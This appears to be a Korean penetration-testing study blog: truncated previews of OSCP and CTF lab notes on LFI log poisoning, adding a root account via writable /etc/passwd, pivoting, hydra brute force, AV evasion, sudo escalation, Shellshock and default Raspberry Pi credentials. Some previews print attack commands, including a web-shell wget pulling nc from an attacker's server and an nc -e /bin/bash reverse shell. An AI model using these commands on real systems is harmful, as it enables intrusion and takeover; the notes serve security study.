Elbrown

* LFI로 로그 파일을 읽을 수 있어야 로그 포이즈닝 가능 Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server We will inject some malicious php code into the server's log. * Note: In order for that to happen, the directory should have read and execute permissions. The log file is located at the following ..

파일전송 TIP * wget 등 여의치 않은 경우 로컬에 존재하는 스크립트 내용을 마우스로 Copy&Paste하여 파일을 생성하면 됨 그외 vim에서 Copy&Paste 클립보드와 연동하는 방법 hyoje420.tistory.com/49 stackoverflow.com/questions/3961859/how-to-copy-to-clipboard-in-vim Exploiting Writeable /etc/passwd 1. /etc/passwd 2. GID가 0인 사용자 존재, 사용자가 passwd파일을 수정할 수 있음 3. 해당 사용자로 로그인 4. 해시 값 생성 openssl passwd -1 -salt [salt] [password] 5. 새로운 루트계정 새로 추가 new:$1$new$p7ptkEKU1..

SMB SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. smbclient //10.10.10.2/secret -U suit -p 445 Telnet Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server ..

CMS epploit 후 서버 콘솔에 들어가서 php 심플 쉘 생성 echo ''>c.php Attacking machine(칼리)에서 현재 디렉토리에 nc 가져오기, python 웹 서버 실행 ln -s $(which nc) python3 -m http.server 8000 심플 웹 쉘로 nc다운로드하게 만들기 http://serverip/files/cmd.php?c=wget http://yourip:8000/nc http://serverip/files/cmd.php?c=chmod 755 nc 리버스 쉘 접속 (* 일부 리눅스에 설치된 nc는 위험하기 때문에 -e옵션이 제거 됨, 해당 옵션 안붙이면 무반응) 서버: nc -lnvp 1234 클라: nc -nv -e /bin/bash [ip] SQLlit..

Borderlands - CTF 스타일.. 우웩 OSCP보다는 버그바운티에 도움이 될 듯한 문제다. - 롸잇업에도 root exploit은 없네 - Pivoting만 다시 테스트해보자.. 내부1:172.18.0.2 내부2:172.16.1.10 Pivoting SSH가 없으므로 다른 터너링 방식 필요 대상에 파이썬이 존재한다면 아래 도구를 사용할 수 있다. 1. SShuttle (파이썬 코드) 2. Rpivot (파이썬 코드) 이 도구는 Python 2.6-2.7과 호환되며 표준 라이브러리 이상의 종속성이 없다. * 그것은 클라이언트-서버 아키텍처를 가지고 있다. 트래픽을 터널링할 시스템에서 클라이언트를 실행하십시오. 서버는 펜티스터의 컴퓨터에서 시작하여 클라이언트에서 들어오는 연결을 청취해야 한다. 자세..

브루트포스 - 폼인증: hydra - basic 인증: medusa - DB 해시 값: John or hashcat 소프트웨어 버전 searchsploit을 통해 exploit 코드 검색 로그인 세션이 필요한 것일 수 있음, 이럴 경우에는 일부 코드 수정 필요 정보수집, 다른 네트워크 체크 root@adminsql:/tmp# cd /var/www/ root@adminsql:/var/www# ls -la root@adminsql:/var/www# cd daaa118f0809caa929e0c0baae75d27a root@adminsql:/var/www/daaa118f0809caa929e0c0baae75d27a# ls -la root@adminsql:/var/www/daaa118f0809caa929e0c0ba..

17.1 - Encoding Payloads with Metasploit 안티백신은 블랙리스트 기술로 여겨진다. 악성코드의 알려진 시그니처가 파일시스템에서 검색되고 만약 발견되면 격리된다. 그러므로 적절한 도구를 사용하면 백신을 우회하는 것은 상대적으로 쉽다. 그 과정은 알려진 악성 파일의 바이너리 구조를 바꾸기 위하여 내용을 암호화 하거나 변경하는 것을 수반한다. 그렇게 함으로써 악성파일로 알려진 시그니처는 더이상 관련이 없게되고 새로운 파일 구조는 백신이 이 파일을 무시하게 함으로써 속일 수 있을지도 모른다. 테스트되는 백신이 백신의 수량과 타입에 따르면, 때때로 백신우회가 달성될 수 있다. 단순히 여러가지 무해한 문자열을 변경함으로써 바이너리 파일안에 있는 대문자부터 소문자까지 As differen..

* 리버스 쉘도 여러가지 방법이 있다. - basic이 안된다면 설치된 프로그래밍을 고려하여 다른 방법을 테스트 해보자. * sudo 사용을 통한 권한 상승 * 크론잡이 되는지 확인하는 방법? - 홈 디렉토리 체크 - 최근에 변경된 파일 확인 sudo를 사용해 사용 가능한 권한 sudo -l scriptmanager script 매니저로 변경 sudo -u scriptmanager 콘솔에서할 경우 sudo -u scriptmanager bash -i phpbash Using phpbash to gain a full shell is trivial. Simply using one of many connect-back commands or using phpbash to grab a Meterpreter sta..

Shocker - 이 문제는 쉘쇼크 문제 - 서버설정 잘 못됨 URL 퍼징시 /cgi-bin/ 가 403인걸 발견해야하는데 404를 받음 (write-up과 내용이 다르다) - 잘 안되면 그냥 공개된 write-up 보는게 낫겠다 싶다. - searchsploit의 코드가 형변환 등의 에러나서 수정해서 써야하는 경우도 있음 searchsploit -m 45939 * Exploit 코드에러 발생 => int 형변환 수정 root 존재 확인 hydra -l root -P /tools/rockyou.txt ssh://10.10.10.56:2222 -v -t 4 * SSH경우 thread 제한을 걸어두는걸 추천함 dirb를 사용한 write-up 확인해보기 lcesteves.wordpress.com/2019/0..

라즈베리파이(IOT) + 포렌식 문제 Nmap pihole 3.1.4 ftl 2.10 디폴트 패스워드 재사용(PI admin = SSH root 계정) SSH username:pi. password:raspberry. root.txt가 USB에 존재 마운트된 디스크 확인 df -h fdisk -l /medea/usbstick lost+found 디렉토리 확인 => 파일이 없어서 fsck 복구 어렵. 방법1 strings /media/usbstick 방법2 이미징, 복구 Method 2 - Imaging and Recovery The command sudo dcfldd if=/dev/sdb of=/home/pi/usb.dd will create an image of the USB stick and save..